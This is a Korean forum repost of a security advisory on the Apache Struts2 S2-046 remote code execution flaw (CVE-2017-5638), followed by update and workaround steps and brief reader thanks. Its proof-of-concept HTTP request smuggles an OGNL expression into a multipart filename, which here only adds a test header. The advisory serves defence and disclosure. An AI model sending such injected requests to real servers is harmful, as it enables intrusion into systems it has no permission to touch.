Latest Posts Recent Comments 문의사항 신고하기 이용안내 이벤트 포인트 리스트 공지사항 관리자문의

공지사항

고정공지

(자유게시판에서 질문 금지) 질문하신 유저는 통보 없이 "계정정리" 될수 있습니다.

놀이터 일간 추천 베스트

놀이터 일간 조회 베스트


Apache Struts2 원격코드실행 취약점 주의!(CVE-2017-5638, S2-046)


최근 S2-045 취약점과 유사한 원격코드실행 취약점이 또 다시 발견되었습니다. 


취약점 개요


악성 Content-Disposition값 혹은 부적절한 Content-Length 헤더를 이용하여 원격코드를 실행할 수 있는 취약점 입니다. 해당 취약점은 S2-045와 유사하지만, 사용하는 공격 벡터가 다릅니다. 


CVE 번호


CVE-2017-5638



PoC


POST /doUpload.action HTTP/1.1

Host: localhost:8080

Content-Length: 10000000

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z

Connection: close

------WebKitFormBoundaryAnmUgTEhFhOZpr9z

Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"

Content-Type: text/plain

Kaboom 

------WebKitFormBoundaryAnmUgTEhFhOZpr9z--



해결방법


1) Apache Struts 2.3.2 혹은 2.5.10.1로 업데이트

(▶참고 : Struts 2.3.32 업데이트Struts 2.5.10.1업데이트)


2) 만약 업데이트를 할 수 없는 상황 중 Apache Struts 2.3.8 – 2.5.5 혹은 2.3.20 – 2.5.5버전 사용자라면 새로개발된 플러그인 사용

(▶참고 : https://github.com/apache/struts-extras)


3) 만약 업데이트를 할 수 없는 상황 중 Struts 2.5.8 – 2.5.10 사용자라면 스택에서 File Upload Interceptor 삭제하고 스택을 정의하고 기본으로 설정한다.

(▶참고 : https://cwiki.apache.org/confluence/display/WW/How+do+we+configure+an+Interceptor+to+be+used+with+every+Action)


25084B3D58D0CFDA1967B4



참고 :

https://cwiki.apache.org/confluence/display/WW/S2-045

https://cwiki.apache.org/confluence/display/WW/S2-046

https://community.hpe.com/t5/Security-Research/Struts2-046-A-new-vector/ba-p/6949723#.WNAr_RLyvpR



출처: http://blog.alyac.co.kr/1025 [알약 공식 블로그]

자료만 받아갈줄 아는 회원님들께, 개발자님들에게 최소한의 경우는 우리가 피드백으로 보답하는 겁니다

문제가 있던 없던 그동안 고생하신 것을 생각하여 피드백 작성을 부탁 드립니다
­

의견쓰기::  상업광고, 인신공격,비방, 욕설, 아주강한음담패설등의 코멘트는 예고없이 삭제될수 있습니다. 회원정리 게시판

profile

Bobono

2017.03.28 00:41
가입일: 2016:12.05
총 게시물수: 17
총 댓글수: 815

좋은 정보 고맙습니다.

profile

shaula

2017.03.28 10:09
가입일: 2018:10.08
총 게시물수: 2
총 댓글수: 567

감사합니다.

profile

무무심

2017.03.28 11:07
가입일: 2018:10.04
총 게시물수: 12
총 댓글수: 1882

정보 감사합니다

profile

프리네

2017.03.28 21:08
가입일: 2016:05.06
총 게시물수: 310
총 댓글수: 13182

정보 감사합니다.

profile

hallasan

2017.04.09 13:56
가입일:
총 게시물수: 0
총 댓글수: 375

감사합니다

List of Articles
번호 제목 글쓴이 날짜 조회 수
공지 보안 게시판 신설 file + 8 Op 2016-10-16 585
61 보안 소식 CryptoNar 랜섬웨어 출현! 모든 파일 암호화 + 3 파란하늘 09-17 227
60 보안 소식 CryptoMiz의 변종인 Revenge 랜섬웨어, RIG 익스플로잇 키트를 통해 배포 돼 + 7 j1159 03-17 85
59 보안 소식 CryptoMix 의 변형 CryptoShield 랜섬웨어 + 6 j1159 02-28 249
58 보안 소식 CryLocker 변형인 Sage 랜섬웨어 + 7 j1159 02-28 282
57 보안 소식 CIA 기밀 문건 통해 드러난 애플 취약점, “이미 수정” + 5 ordo 03-27 77
56 보안 소식 CCTV 영상정보 보안의 끝...데이터 암호화, 위변조 방지 등 기술적 필수요건 file + 7 따봉 12-28 122
55 보안 소식 CA API 관리 솔루션, ‘자본시장 공동 핀테크 오픈플랫폼’ 지원 file + 8 따봉 12-27 58
54 보안 소식 ATM서 악성코드 발견…고객정보 유출 우려 + 7 j1159 03-20 143
53 보안 소식 Apple(iOS) 보안 업데이트 권고 + 6 ordo 04-09 120
» 보안 소식 Apache Struts2 원격코드실행 취약점 주의!(CVE-2017-5638, S2-046) + 5 ordo 03-27 352
51 보안 소식 99개국에 10시간동안 7만5천건의 랜섬웨어 공격이 발생 + 10 pavkim 05-13 162
50 보안 소식 6개월마다 비밀번호 변경하면 과연 해킹으로부터 안전할까 + 6 티오피 09-26 109
49 보안 소식 5G보안 기술자문협 내달 초 종료…화웨이 논란 변수될까 + 1 돌까루 05-29 324
48 보안 소식 540,000대의 차량 추적 장치의 비밀번호, 온라인에 유출 돼 + 4 티오피 09-26 92
47 보안 소식 4개월만에 입연 정부, 암호화폐 규제공백 기조 '유지' 돌까루 05-29 284
46 보안 소식 3·20 사이버테러 악몽 되살아나나? 국내 ATM 해킹 ‘파장’ + 6 j1159 03-21 118
45 보안 소식 2중 인증 방식도 레딧 해킹 막지 못해 + 1 티오피 09-08 151
44 보안 소식 2019년 POS 전용 운용체계(OS) 서비스 종료...결제단말기 해커 놀이터 '표적' + 6 ordo 04-09 83
43 보안 소식 2019년 1분기, 모바일 뱅킹 악성코드 증가해 kargans 05-29 292
42 보안 소식 2019년 1분기, 모바일 뱅킹 악성코드 증가해 kargans 05-31 302
41 보안 소식 2017년 해킹을 일반인에게 이해시켜야 할지도 모르는 해 file + 7 따봉 01-04 121
40 보안 소식 2017년 사이버 보안, 대담한 예측 6가지 file + 6 따봉 01-02 49
39 보안 소식 2017년 보안 분야에서 주목해야 할 5가지 file + 7 따봉 01-02 45
38 보안 소식 2017년 3월 국내 최대 보안 이벤트 ‘SECON 2017’ 열린다 file + 7 따봉 01-02 71
37 보안 소식 2017년 3大 보안 키워드: 랜섬웨어와 IoT, 그리고 클라우드 file + 8 따봉 12-12 161
36 보안 소식 2017년 3大 보안 키워드: 랜섬웨어와 IoT, 그리고 클라우드 file + 7 따봉 01-02 50
35 보안 소식 2017 결산-보안]지구촌 '울린' 랜섬웨어 + 3 덕애 12-30 218
34 보안 소식 2016년을 장식한 최악의 해킹 공격 7 file + 10 따봉 12-12 355
33 보안 소식 2016년을 장식한 최악의 해킹 공격 7 file + 11 따봉 12-21 86
32 보안 소식 2016년, 보안 업계를 깜짝 놀래킨 서프라이즈 5 file + 9 따봉 12-21 60